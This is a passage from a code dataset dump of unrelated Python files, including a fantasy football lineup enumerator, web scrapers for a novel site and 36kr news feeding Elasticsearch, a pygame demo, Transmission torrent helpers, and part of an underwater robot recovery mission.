main()\n\n\n\n","sub_path":"ArturGame.py","file_name":"ArturGame.py","file_ext":"py","file_size_in_byte":27485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"441385570","text":"def create_all_lineups(qb_df_small, rb_df_small, wr_df_small, te_df_small, dst_df_small, point_thresh):\r\n import pandas as pd\r\n import numpy as np\r\n from itertools import combinations\r\n\r\n \"Data frame to vectors to allow for much faster looping\"\r\n qb_player = qb_df_small['Player'].values\r\n rb_player = rb_df_small['Player'].values\r\n wr_player = wr_df_small['Player'].values\r\n te_player = te_df_small['Player'].values\r\n dst_player = dst_df_small['Player'].values\r\n\r\n qb_salary = qb_df_small['Salary'].values\r\n rb_salary = rb_df_small['Salary'].values\r\n wr_salary = wr_df_small['Salary'].values\r\n te_salary = te_df_small['Salary'].values\r\n dst_salary = dst_df_small['Salary'].values\r\n\r\n qb_points = qb_df_small['DK_Points'].values\r\n rb_points = rb_df_small['DK_Points'].values\r\n wr_points = wr_df_small['DK_Points'].values\r\n te_points = te_df_small['DK_Points'].values\r\n dst_points = dst_df_small['DK_Points'].values\r\n \r\n \"Initialize Vectors for all possible all_lineupss under salary requirements\"\r\n qb_all = []\r\n rb1_all = []\r\n rb2_all = []\r\n wr1_all = []\r\n wr2_all = []\r\n wr3_all = []\r\n te1_all = []\r\n flex_all = []\r\n dst1_all = []\r\n points_all = []\r\n salary_all = []\r\n\r\n \"Setup unique combinations (avoid duplicates with multiple slots) - RB As Flex\"\r\n qb = list(combinations(range(len(qb_df_small)), 1))\r\n rb = list(combinations(range(len(rb_df_small)), 3))\r\n wr = list(combinations(range(len(wr_df_small)), 3))\r\n te = list(combinations(range(len(te_df_small)), 1))\r\n dst = list(combinations(range(len(dst_df_small)), 1))\r\n\r\n for a in qb:\r\n for b in rb:\r\n for c in wr:\r\n for d in te:\r\n for e in dst:\r\n total_salary = qb_salary[a[0]] + rb_salary[b[0]] + rb_salary[b[1]] + wr_salary[c[0]] + wr_salary[\r\n c[1]] + wr_salary[c[2]] + rb_salary[b[2]] + te_salary[d[0]] + dst_salary[e[0]]\r\n if total_salary < 50001 and total_salary > 49499:\r\n total_points = qb_points[a[0]] + rb_points[b[0]] + rb_points[b[1]] + wr_points[c[0]] + \\\r\n wr_points[c[1]] + wr_points[c[2]] + rb_points[b[2]] + te_points[d[0]] + \\\r\n dst_points[e[0]]\r\n if total_points > point_thresh:\r\n qb_all.append(qb_player[a[0]])\r\n rb1_all.append(rb_player[b[0]])\r\n rb2_all.append(rb_player[b[1]])\r\n wr1_all.append(wr_player[c[0]])\r\n wr2_all.append(wr_player[c[1]])\r\n wr3_all.append(wr_player[c[2]])\r\n te1_all.append(te_player[d[0]])\r\n flex_all.append(rb_player[b[2]])\r\n dst1_all.append(dst_player[e[0]])\r\n points_all.append(total_points)\r\n salary_all.append(total_salary)\r\n\r\n # \"Setup unique combinations (avoid duplicates with multiple slots) - WR As Flex\"\r\n # rb = list(combinations(range(len(rb_df_small)), 2))\r\n # wr = list(combinations(range(len(wr_df_small)), 4))\r\n\r\n # for a in qb:\r\n # for b in rb:\r\n # for c in wr:\r\n # for d in te:\r\n # for e in dst:\r\n # total_salary = qb_salary[a[0]] + rb_salary[b[0]] + rb_salary[b[1]] + wr_salary[c[0]] + wr_salary[\r\n # c[1]] + wr_salary[c[2]] + wr_salary[c[3]] + te_salary[d[0]] + dst_salary[e[0]]\r\n # if total_salary < 50001 and total_salary > 49499:\r\n # total_points = qb_points[a[0]] + rb_points[b[0]] + rb_points[b[1]] + wr_points[c[0]] + \\\r\n # wr_points[c[1]] + wr_points[c[2]] + wr_points[c[3]] + te_points[d[0]] + \\\r\n # dst_points[e[0]]\r\n # if total_points > point_thresh:\r\n # qb_all.append(qb_player[a[0]])\r\n # rb1_all.append(rb_player[b[0]])\r\n # rb2_all.append(rb_player[b[1]])\r\n # wr1_all.append(wr_player[c[0]])\r\n # wr2_all.append(wr_player[c[1]])\r\n # wr3_all.append(wr_player[c[2]])\r\n # te1_all.append(te_player[d[0]])\r\n # flex_all.append(wr_player[c[3]])\r\n # dst1_all.append(dst_player[e[0]])\r\n # points_all.append(total_points)\r\n # salary_all.append(total_salary)\r\n\r\n # \"Setup unique combinations (avoid duplicates with multiple slots) - TE As Flex\"\r\n # wr = list(combinations(range(len(wr_df_small)), 3))\r\n # te = list(combinations(range(len(te_df_small)), 2))\r\n\r\n # for a in qb:\r\n # for b in rb:\r\n # for c in wr:\r\n # for d in te:\r\n # for e in dst:\r\n # total_salary = qb_salary[a[0]] + rb_salary[b[0]] + rb_salary[b[1]] + wr_salary[c[0]] + wr_salary[\r\n # c[1]] + wr_salary[c[2]] + te_salary[d[0]] + te_salary[d[1]] + dst_salary[e[0]]\r\n # if total_salary < 50001 and total_salary > 49499:\r\n # total_points = qb_points[a[0]] + rb_points[b[0]] + rb_points[b[1]] + wr_points[c[0]] + \\\r\n # wr_points[c[1]] + wr_points[c[2]] + te_points[d[0]] + te_points[d[1]] + \\\r\n # dst_points[e[0]]\r\n # if total_points > point_thresh:\r\n # qb_all.append(qb_player[a[0]])\r\n # rb1_all.append(rb_player[b[0]])\r\n # rb2_all.append(rb_player[b[1]])\r\n # wr1_all.append(wr_player[c[0]])\r\n # wr2_all.append(wr_player[c[1]])\r\n # wr3_all.append(wr_player[c[2]])\r\n # te1_all.append(te_player[d[0]])\r\n # flex_all.append(te_player[d[1]])\r\n # dst1_all.append(dst_player[e[0]])\r\n # points_all.append(total_points)\r\n # salary_all.append(total_salary)\r\n \r\n \"Assign Vectors back to data frame to write to CSV\"\r\n all_lineups = pd.DataFrame(np.random.randint(low=0, high=10, size=(len(qb_all),11)),columns=['QB', 'RB1', 'RB2', 'WR1', 'WR2', 'WR3', 'TE', 'Flex', 'DST', 'Points', 'Salary'])\r\n all_lineups['QB'] = qb_all\r\n all_lineups['RB1'] = rb1_all\r\n all_lineups['RB2'] = rb2_all\r\n all_lineups['WR1'] = wr1_all\r\n all_lineups['WR2'] = wr2_all\r\n all_lineups['WR3'] = wr3_all\r\n all_lineups['TE'] = te1_all\r\n all_lineups['Flex'] = flex_all\r\n all_lineups['DST'] = dst1_all\r\n all_lineups['Points'] = points_all\r\n all_lineups['Salary'] = salary_all\r\n all_lineups.sort_values(by=['Points'], inplace=True, ascending=False)\r\n \r\n \"Drop Low Scoring Lineups & Lineups that don't utilize the Salary Cap\"\r\n all_lineups = all_lineups.reset_index(drop=True)\r\n return all_lineups","sub_path":"Create_All_Lineups.py","file_name":"Create_All_Lineups.py","file_ext":"py","file_size_in_byte":7551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"33180785","text":"\"\"\"\nMultiparent modelling example.\n\nAltought it's unsupported yet, this example contains data to illustrate the behavior of SDV\nwhen modelling and sampling multiparent tables, that is, tables that contain multiple foreign_keys\nfrom other tables.\n\nYou can run this example with:\n\n```\ncd examples/multiparent_example\npython multiparent_example.py\n```\n\n\"\"\"\n\nfrom sdv import SDV\n\n\ndef run_example():\n \"\"\"Example of usage of SDV for tables contanining more than one foreign key.\"\"\"\n # Setup\n vault = SDV('data/meta.json')\n vault.fit()\n\n # Run\n result = vault.sample_all()\n\n for name, table in result.items():\n print('Samples generated for table {}:\\n{}\\n'.format(name, table.head(5)))\n\n\nif __name__ == '__main__':\n run_example()\n","sub_path":"examples/multiparent_example/multiparent_example.py","file_name":"multiparent_example.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"157061751","text":"from __future__ import print_function\nimport re\nimport yaml\nimport os.path\nimport glob\nimport requests\nimport json\n\nTHISDIR=os.path.abspath(os.path.dirname(__file__))\n\nclass Corpus(object):\n\n def __init__(self,id,name):\n self.id=id\n self.name=name\n self.dbs=[]\n # #expand path - space separated list of paths that can be globbed or are a directory\n # for p in paths.split():\n # if os.path.isdir(p):\n # p=os.path.join(p,'*.db')\n # self.dbs.extend(sorted(glob.glob(p)))\n\n def as_dict(self):\n return {\"id\":self.id,\"name\":self.name}#,\"dbs\":self.dbs}\n\ndef get_corpora(corpora_yaml,solr_url):\n r=requests.get(solr_url+\"/select\",params={\"q\":\"*:*\",\"stats\":\"on\",\"stats.field\":\"source\",\"stats.calcdistinct\":\"true\",\"rows\":\"0\",\"wt\":\"json\"})\n response=r.text\n if not response.strip():\n return {}\n known_corpora=json.loads(response)[\"stats\"][\"stats_fields\"][\"source\"][\"distinctValues\"] #corpus ids known in solr\n corpora={} # id -> Corpus()\n with open(corpora_yaml) as f:\n for corpus_id_re, corpus_data in yaml.load(f).iteritems():\n #Which corpora match?\n corpus_id_re=re.compile(u\"^\"+corpus_id_re+u\"$\")\n for known_c in known_corpora:\n match=corpus_id_re.match(known_c)\n if match:\n cname=match.expand(corpus_data[\"name\"])\n c=Corpus(known_c,cname)\n corpora[c.id]=c.as_dict()\n return corpora\n\ndef matching_corpora(idregex,corpora):\n idre=re.compile(idregex)\n return sorted(cid for cid in corpora if idre.match(cid))\n\ndef get_corpus_groups(available_corpora_yaml,corpora):\n groups=[]\n with open(available_corpora_yaml) as f:\n for cgroup in yaml.load(f):\n group_corpus_ids=[]\n for regex in cgroup[\"corpora\"].split():\n group_corpus_ids.extend(matching_corpora(regex,corpora))\n group_corpus_names=list(corpora[c][\"name\"] for c in group_corpus_ids)\n groups.append({\"name\":cgroup[\"name\"],\"corpora\":list(zip(group_corpus_ids,group_corpus_names))})\n return groups\n\nif __name__==\"__main__\":\n corpora=get_corpora(os.path.join(THISDIR,\"corpora.yaml\"),\"http://localhost:8983/solr/depsearch6\")\n corpus_groups=get_corpus_groups(os.path.join(THISDIR,\"corpus_groups.yaml\"),corpora)\n print(corpus_groups)\n\n","sub_path":"api_gui/webapi/available_corpora.py","file_name":"available_corpora.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"338814001","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport my_tools\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\nspace='\\t'\nenter='\\r\\n'\n\n\n\nclass BiqugePipeline:\n\n\n def process_item(self, item, spider):\n\n with open('./{}-{}-{}.txt'.format(item['title'],item['author'],item['category']),'a',encoding='utf-8') as f:\n f.write(item['title'])\n f.write(space+item['des'])\n f.write(enter)\n f.write(enter)\n\n f.write('目录')\n f.write(enter)\n f.write(enter)\n for i in item['chapter']:\n chapter_name=item['chapter'][i][0]\n f.write(space + chapter_name)\n f.write(enter)\n f.write(enter)\n\n\n\n\n for i in item['chapter']:\n chapter_name,chapter_content=item['chapter'][i]\n f.write(space + chapter_name)\n f.write(enter)\n for j in chapter_content:\n j=my_tools.qu_kong_ge(j)\n j=my_tools.qu_html_lable(j)\n f.write(space+space + j)\n f.write(enter)\n f.write(enter)\n","sub_path":"scrapy-demo/biquge/biquge/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"204995693","text":"import pygame\npygame.init()\nwin = pygame.display.set_mode((500, 500))\n\n\n#название окна приложения\npygame.display.set_caption('score and multiplication table')\n\n#координаты игрока, которые можно регулировать\nx = 50\ny = 425\nwidth = 40\nheight = 60\nspeed = 5\n\nisJump = False\njumpCount = 10\n\nrun = True\nwhile run:\n pygame.time.delay(35)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n\n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT] and x > 5:\n x -= speed\n if keys[pygame.K_RIGHT] and x < 500 - width - 5:\n x += speed\n if not (isJump):\n if keys[pygame.K_UP] and y > 5:\n y -= speed\n if keys[pygame.K_DOWN] and y < 500 - height - 15:\n y += speed\n if keys[pygame.K_SPACE]:\n isJump = True\n else:\n if jumpCount >= -10:\n if jumpCount < 0:\n y += (jumpCount ** 2) / 2\n else:\n y -= (jumpCount ** 2) / 2\n jumpCount -= 1\n else:\n isJump = False\n jumpCount = 10\n\n win.fill((0,0,0))\n pygame.draw.rect(win, (163,73,164), (x, y, width, height))\n pygame.display.update()\n\npygame.quit()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"41378948","text":"from PyQt5.QtCore import pyqtSlot, pyqtSignal, QObject\nfrom clutch.core import TransmissionRPCError\nfrom transmigrate.transmigrate.core import Transmigrate\n\n\ndef transmigrate_worker(progress, add_torrent, search_folders, torrents):\n work = TransmigrateWork()\n work.progress.connect(progress)\n work.added_torrent.connect(add_torrent)\n work.run(search_folders, torrents)\n work.progress.disconnect(progress)\n\n\ndef transmigrate_torrents(callback):\n print(callback)\n work = TransmigrateWork()\n print(\"hmmm\")\n work.torrents.connect(callback)\n print(\"lol\")\n work.get_client_torrents()\n work.torrent.disconnect(callback)\n\n\ndef transmigrate_remove_all():\n work = TransmigrateWork()\n work.transmigrate.remove_all_torrents()\n\n\ndef transmigrate_get_collected(callback, dirs):\n print(callback, dirs)\n work = TransmigrateWork()\n work.torrentfiles.connect(callback)\n work.get_collected_files(dirs)\n\n\nclass TransmigrateWork(QObject):\n '''Class that handles Transmigrate work - repeated slow calls to Transmission'''\n\n progress = pyqtSignal(int)\n added_torrent = pyqtSignal(str, str)\n torrents = pyqtSignal(list)\n torrentfiles = pyqtSignal(object)\n\n def __init__(self):\n super(self.__class__, self).__init__()\n self.transmigrate = Transmigrate()\n\n def get_client_torrents(self):\n print(\"called!\")\n self.torrents.emit(self.transmigrate.get_client_torrents())\n\n def get_collected_files(self, dirs):\n print(\"called! transmigrate work\")\n self.torrentfiles.emit(self.transmigrate.torrent_collector.collect_file_dirs(dirs))\n print(\"emitted signal\")\n\n def run(self, search_folders, torrent_files):\n if len(search_folders) > 0:\n for folder in search_folders:\n self.transmigrate.storage_manager.add_storage_dir(folder)\n\n if len(torrent_files) > 0:\n # initialize progress bar\n total = len(torrent_files)\n progress = 0\n self.progress.emit(0)\n\n for torrent_file in torrent_files:\n try:\n response = self.transmigrate.add_to_transmission(torrent_file)\n location_match = self.transmigrate.storage_manager.find_existing_storage(torrent_file)\n if location_match:\n self.transmigrate.set_storage(response['id'], location_match)\n self.transmigrate.verify_storage(response['id'])\n self.added_torrent.emit(torrent_file.get_name(), str(location_match))\n except TransmissionRPCError as error:\n if error.args[0] == 'torrent-duplicate':\n pass\n else:\n pass # error-handling\n # increment progress\n progress += 1\n self.progress.emit(int(progress / total * 100))\n","sub_path":"transmigrate/gui/threads.py","file_name":"threads.py","file_ext":"py","file_size_in_byte":2927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"569828276","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Mar 11 17:40:07 2020\r\n\r\n@author: Naomi\r\n\"\"\"\r\n\r\n#Some simple math\r\n\r\n#Store a 3-digit number in a\r\na=123\r\n#Write the digits of a twice\r\nb=123123\r\n#Check whether b can be divided by 7\r\nif b%7==0:\r\n print('b can be divided by 7')\r\nelse:\r\n print('b cannot be divided by 7')\r\n#Assign c to be b divided by 7\r\nc=b/7\r\n#Assign d to be c divided by 11\r\nd=c/11\r\n#Assign e to be c divided by 13\r\ne=d/13\r\n#Compare e to a\r\nif e>a:\r\n print('e is greater than a')\r\nelif emax:\n max = itm\n return (min, max)\n \nnmbs = [-13, 27, 59, -70, 44]\na, b = minmax(nmbs)\nprint('Minimum: %d Maximum: %d' % (a, b))\n","sub_path":"examples/loesungen-kap09-func/minmax.py","file_name":"minmax.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"589840980","text":"import datetime\nimport scrapy\nfrom scrapy.crawler import CrawlerProcess\nfrom urllib.parse import urlparse\nfrom urllib.parse import parse_qs\nimport os\nimport re\nimport sys\nimport json\nimport pydash as _\nimport pprint\nfrom pytz import timezone\nimport time\n\npp = pprint.PrettyPrinter(indent=4)\n\nsys.path.append('..')\nfrom es.es_client import EsClient\n\nclass TestSpider(scrapy.Spider):\n name = '36kr_all'\n domin = 'https://www.36kr.com'\n source = '36kr'\n current = 0\n total = 0\n\n def start_requests(self):\n self.es = EsClient()\n start_url = 'https://www.36kr.com/information/web_news/'\n yield scrapy.Request(start_url)\n\n def parse(self, response):\n\n pageCallback = re.findall(\n r'(?<=\"pageCallback\":\")(.*?)(?=\")', str(response.text))\n if len(pageCallback) == 0:\n os._exit(0)\n\n pageCallback = pageCallback[0]\n\n firstListJosn = re.findall(\n r'(?<=)', str(response.text))\n firstList = json.loads(firstListJosn[0])\n items = _.get(firstList, 'information.informationList.itemList')\n\n self.itemsImport(items)\n \n yield self.getNextQuery(pageCallback)\n \n def itemsImport(self, items):\n \n yesterday = (datetime.date.today() + datetime.timedelta(days=-1)).strftime(\"%Y-%m-%d\")\n today = datetime.date.today().strftime(\"%Y-%m-%d\")\n \n start_time = int(time.mktime(time.strptime(str(yesterday), '%Y-%m-%d')))\n end_time = int(time.mktime(time.strptime(str(today), '%Y-%m-%d')))\n \n\n bulk = []\n to_next = True\n for item in items:\n t = item['templateMaterial']\n if 'widgetTitle' not in t:\n continue\n\n doc = {}\n doc['title'] = t['widgetTitle']\n doc['url'] = self.domin + '/p/' + str(t['itemId'])\n\n if 'authorName' in t:\n doc['author'] = t['authorName']\n\n if 'authorRoute' in t: \n userId = t['authorRoute'].replace('detail_author?userId=', '')\n doc['author_url'] = self.domin + '/user/' + str(userId)\n\n doc['source'] = self.source\n \n if 'themeName' in t:\n doc['tag'] = t['themeName']\n \n if 'summary' in t:\n doc['summary'] = t['summary']\n\n created_at = int(t['publishTime']/1000)\n \n if created_at > end_time:\n print(\"too new\")\n continue;\n \n if created_at < start_time :\n to_next = False\n print(\"too old\")\n continue;\n \n \n date_time_obj = datetime.datetime.fromtimestamp(\n t['publishTime']/1000)\n\n doc['created_at'] = date_time_obj.astimezone(timezone(\"UTC\")).strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n doc['created_year'] = date_time_obj.strftime(\"%Y\")\n\n bulk.append(\n {\"index\": {\"_index\": \"article\"}})\n bulk.append(doc)\n\n if len(bulk) > 0:\n resp = self.es.client.bulk(body=bulk)\n \n if not to_next:\n os._exit(0)\n \n def getNextQuery(self, pageCallback):\n flow_url = 'https://gateway.36kr.com/api/mis/nav/ifm/subNav/flow'\n \n payload = {\n \"partner_id\": \"web\",\n \"timestamp\": 1662859338075,\n \"param\": {\n \"subnavType\": 1,\n \"subnavNick\": \"web_news\",\n \"pageSize\": 100,\n \"pageEvent\": 1,\n \"pageCallback\": pageCallback,\n \"siteId\": 1,\n \"platformId\": 2\n }\n }\n return scrapy.http.JsonRequest(flow_url, data=payload, callback=lambda response, payload=payload : self.nextPageParse(response, payload))\n \n def nextPageParse(self, reponse, payload):\n resp = json.loads(reponse.text)\n \n pageCallback = _.get(resp,'data.pageCallback')\n items = _.get(resp,'data.itemList')\n hasNextPage = _.get(resp,'data.hasNextPage')\n \n self.itemsImport(items)\n \n \n if hasNextPage == 1:\n yield self.getNextQuery(pageCallback)\n # pp.pprint(resp)\n\n\nif __name__ == \"__main__\":\n process = CrawlerProcess()\n process.crawl(TestSpider)\n process.start()\n","sub_path":"scrapy/36kr/36kr_daily.py","file_name":"36kr_daily.py","file_ext":"py","file_size_in_byte":4478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"616101046","text":"from item import Item\n\nclass Consumable(Item):\n\t\"\"\"\n\t\"\"\"\n\tdef __init__(self, name, health, sprite):\n\t\tsuper(Consumable, self).__init__(name, True, True, False, health, 0, 0,\n\t\t\tsprite)\n\t\n\tdef debug(self):\n\t\tfrom database import Database as db\n\t\tsuper(Consumable, self).debug()\n\t\tprint(\" {0}: {1}\\n {2}: {3}\".format(\n\t\t\tdb.strings[9], db.strings[10], db.strings[5], self.health))\n\t\t# Traditional version:\n\t\t# print(\" \", db.strings[9], \": \", db.strings[10], sep=\"\")\n\t\t# print(\" \", db.strings[5], \": \", self.health, sep=\"\")\n","sub_path":"project/consumable.py","file_name":"consumable.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"640267692","text":"from app.libs.files.lib_file import LibFile\nfrom app.libs.patterns.singleton import Singleton\nfrom app.libs.pagination.pagination import Pagination\n\n\nclass BaseService(metaclass=Singleton):\n db_repo = None\n\n def __init__(self):\n self._lib_file = LibFile()\n\n def get_next_id(self, db_table=None, is_update=False):\n if self.db_repo is not None:\n if db_table is None:\n db_table = self.db_repo.db_table\n return self.db_repo.get_next_sequence(db_table, is_update)\n return 1\n\n def get_data_by_pk(self, pk):\n item = None\n if self.db_repo is not None:\n item = self.db_repo.get_data_by_pk(pk)\n\n return item\n\n def save(self, data: dict):\n if self.db_repo is not None:\n return self.db_repo.save(data)\n return None\n\n def delete(self, pk):\n if self.db_repo is not None:\n return self.db_repo.delete(pk)\n return None\n\n def count(self, conditions):\n if self.db_repo is not None:\n return self.db_repo.count(conditions)\n return 0\n\n def get_items(self, conditions={}, page=0, limit=100, sort_field=\"_id\"):\n items = None\n if self.db_repo is not None:\n # start Pagination\n total = self.count(conditions)\n pagination = Pagination(total, limit, int(page))\n start = (int(page) - 1) if int(page) > 0 else int(page)\n # end Pagination\n items = self.db_repo.find(conditions, start, limit, sort_field)\n\n return items, pagination\n","sub_path":"app/services/base/base_service.py","file_name":"base_service.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"36749039","text":"import sys\n\nclass Solution:\n # Write your code here\n stack = []\n queue = []\n x = 0\n y = 0\n z = 0 \n def pushCharacter(self,char) :\n self.stack.append(char)\n self.x = self.x + 1\n \n def popCharacter(self) :\n self.x = self.x - 1\n #print (self.x , \":\" , self.stack[self.x])\n return (self.stack[self.x])\n \n def enqueueCharacter(self,char):\n self.queue.append(char) \n self.y = self.y + 1\n \n def dequeueCharacter(self) :\n #print (self.queue , \"#\" , self.z , \"#\" , self.queue[self.z])\n if self.z == 0 :\n self.z = self.z + 1\n return (self.queue[0])\n else:\n self.z = self.z + 1\n return (self.queue[self.z - 1])\n\n\n \n \n \n\n# read the string s\n#s=input()\ns = 'racecar'\n#Create the Solution class object\nobj=Solution() \n\nl=len(s)\n# push/enqueue all the characters of string s to stack\nfor i in range(l):\n obj.pushCharacter(s[i])\n obj.enqueueCharacter(s[i])\n \nisPalindrome=True\n'''\npop the top character from stack\ndequeue the first character from queue\ncompare both the characters\n''' \nfor i in range(l // 2):\n if obj.popCharacter()!=obj.dequeueCharacter():\n isPalindrome=False\n break\n#finally print whether string s is palindrome or not.\nif isPalindrome:\n print(\"The word, \"+s+\", is a palindrome.\")\nelse:\n print(\"The word, \"+s+\", is not a palindrome.\") ","sub_path":"prb18.py","file_name":"prb18.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"103047363","text":"import math\nimport random\nimport time\nfrom collections import namedtuple, deque\nimport numpy as np\n\nimport shm\nimport aslam\nfrom mission.constants.config import recovery as constants\nfrom mission.constants.region import WALL_TOWER_HEADING\nfrom shm import recovery_state as world\nfrom shm.watchers import watcher\nfrom mission.framework.task import Task\nfrom mission.framework.targeting import DownwardTarget, PIDLoop\nfrom mission.framework.combinators import Sequential, Concurrent, MasterConcurrent\nfrom mission.framework.movement import Depth, RelativeToCurrentHeading, RelativeToCurrentDepth, \\\n VelocityX, VelocityY, Heading\nfrom mission.framework.timing import Timer, Timeout\nfrom mission.framework.primitive import Zero, FunctionTask, NoOp, Log\nfrom mission.framework.helpers import get_downward_camera, ConsistencyCheck\nfrom mission.framework.actuators import SetActuators\nfrom mission.framework.position import MoveXY, MoveXYRough, MoveX, MoveY, GoToPosition, PositionalControl\nfrom mission.framework.search import SpiralSearch\nfrom mission.framework.track import Tracker, ConsistentObject\nfrom mission.missions.ozer_common import Retry, Success, SequentialSuccess, CheckDistance, \\\n Conditional\nfrom auv_python_helpers.angles import heading_sub_degrees\n\n\"\"\"\n ____ ___ ____ ________\n / __ \\___ _________ _ _____ _______ __ |__ \\ / __ < / ___/\n / /_/ / _ \\/ ___/ __ \\ | / / _ \\/ ___/ / / / __/ // / / / / __ \\\n / _, _/ __/ /__/ /_/ / |/ / __/ / / /_/ / / __// /_/ / / /_/ /\n/_/ |_|\\___/\\___/\\____/|___/\\___/_/ \\__, / /____/\\____/_/\\____/\n /____/\n\"\"\"\n\n# TODO: rearrange stuff in file to make more sense\n# TODO: log successes and failures of same task in same task?\n# TODO: refactor vision results shm group into separate, per-object groups?\n\nclass Vision(Task):\n STACK_FIELDS = ['visible', 'red', 'x', 'y', 'area', 'aspect_ratio', 'angle']\n MARK_FIELDS = ['visible', 'x', 'y', 'area']\n REGION_FIELDS = ['visible', 'x', 'y', 'area']\n TABLE_FIELDS = ['visible', 'x', 'y', 'area']\n Stack = namedtuple('Stack', STACK_FIELDS)\n Mark = namedtuple('Mark', MARK_FIELDS)\n Region = namedtuple('Region', REGION_FIELDS)\n Table = namedtuple('Table', TABLE_FIELDS)\n COLORS = ['red', 'green']\n TRACKING_REJECT_WIDTH_RATIO = 0.15\n\n def on_first_run(self, camera, *args, **kwargs):\n self.camera = camera\n self.watcher = watcher()\n self.watcher.watch(shm.recovery_vision)\n\n self.stacks = [None] * 4\n tracker = lambda: Tracker(self.camera['width'] * Vision.TRACKING_REJECT_WIDTH_RATIO)\n self.red_stack_tracker = tracker()\n self.green_stack_tracker = tracker()\n self.mark_mappings = {color: ConsistentObject() for color in Vision.COLORS}\n self.region_mappings = {color: ConsistentObject() for color in Vision.COLORS}\n self.blocker_mappings = {color: ConsistentObject() for color in Vision.COLORS}\n self.table_mapping = ConsistentObject()\n\n self.pull()\n\n def on_run(self, *args, **kwargs):\n if self.watcher.has_changed():\n self.pull()\n\n def pull(self):\n self.shm = shm.recovery_vision.get()\n self.cam_center = (self.camera['width'] / 2, self.camera['height'] / 2)\n self.pull_stacks()\n self.pull_marks()\n self.pull_regions()\n self.pull_blockers()\n self.pull_table()\n\n def pull_stacks(self):\n red_stacks, green_stacks = [], []\n for i in range(4):\n vals = {}\n for field in Vision.STACK_FIELDS:\n vals[field] = getattr(self.shm, 'stack_{}_{}'.format(i+1, field))\n stack = Vision.Stack(**vals)\n if stack.visible:\n if stack.red:\n red_stacks.append(stack)\n else:\n green_stacks.append(stack)\n pad_list = lambda x: x + ([None] * (2 - len(x)))\n red_stacks = pad_list(red_stacks)\n green_stacks = pad_list(green_stacks)\n\n new_red_stacks = self.red_stack_tracker.track(*red_stacks)\n new_green_stacks = self.green_stack_tracker.track(*green_stacks)\n for i, s in enumerate(new_red_stacks + new_green_stacks):\n if s is not None and self.stacks[i] is None:\n self.logv('Started tracking {} stack at index {}'.format(\n 'red' if s.red else 'green', i))\n elif s is None and self.stacks[i] is not None:\n self.logv('Stopped tracking {} stack at index {}'.format(\n 'red' if self.stacks[i].red else 'green', i))\n self.stacks[i] = s\n\n self.debug_locations(self.stacks, 0)\n\n def pull_marks(self):\n self.marks = []\n for color in Vision.COLORS:\n vals = {}\n for field in Vision.MARK_FIELDS:\n vals[field] = getattr(self.shm, '{}_mark_{}'.format(color, field))\n mark = Vision.Mark(**vals)\n self.marks.append(self.mark_mappings[color].map(mark))\n\n self.debug_locations(self.marks, len(self.stacks))\n\n def pull_regions(self):\n self.regions = []\n for color in Vision.COLORS:\n vals = {}\n for field in Vision.REGION_FIELDS:\n vals[field] = getattr(self.shm, '{}_region_{}'.format(color, field))\n region = Vision.Region(**vals)\n self.regions.append(self.region_mappings[color].map(region))\n\n self.debug_locations(self.regions, len(self.stacks) + len(self.marks))\n\n def pull_blockers(self):\n self.blockers = {}\n for color in Vision.COLORS:\n blocker = getattr(self.shm, '{}_stack_blocking'.format(color))\n if not blocker:\n blocker = None\n self.blockers[color] = self.blocker_mappings[color].map(blocker)\n\n def pull_table(self):\n vals = {field: getattr(self.shm, 'table_{}'.format(field)) for field in Vision.TABLE_FIELDS}\n table = Vision.Table(**vals)\n self.table = self.table_mapping.map(table if table.visible else None)\n\n def debug_locations(self, objects, index_offset, coord_offset=(0, 0)):\n vision_debug = shm.vision_debug.get()\n for i, obj in enumerate(objects):\n if obj is not None and obj.visible:\n setattr(vision_debug, 'x{}'.format(i + index_offset), int(obj.x + coord_offset[0]))\n setattr(vision_debug, 'y{}'.format(i + index_offset), int(obj.y + coord_offset[1]))\n setattr(vision_debug, 'text{}'.format(i + index_offset), bytes(str(i + index_offset), encoding='utf-8'))\n else:\n setattr(vision_debug, 'text{}'.format(i + index_offset), b'')\n\n shm.vision_debug.set(vision_debug)\n\nExtendAmlan = lambda: SetActuators(['piston_extend'], ['piston_retract'])\nRetractAmlan = lambda: SetActuators(['piston_retract'], ['piston_extend'])\n#ExtendAmlan = NoOp\n#RetractAmlan = NoOp\n\nclass Recovery(Task):\n initial_surface_retries = 10\n get_stack_retries = 10\n\n def on_first_run(self, vision, reset_state=True, *args, **kwargs):\n RetractAmlan()()\n if reset_state:\n w = world.get()\n w.stacks_on_tower = 4\n w.first_hstack_removed = 0\n w.grabber_stack_present = 0\n w.stacks_on_table = 0\n w.spiral_search_timed_out = 0\n 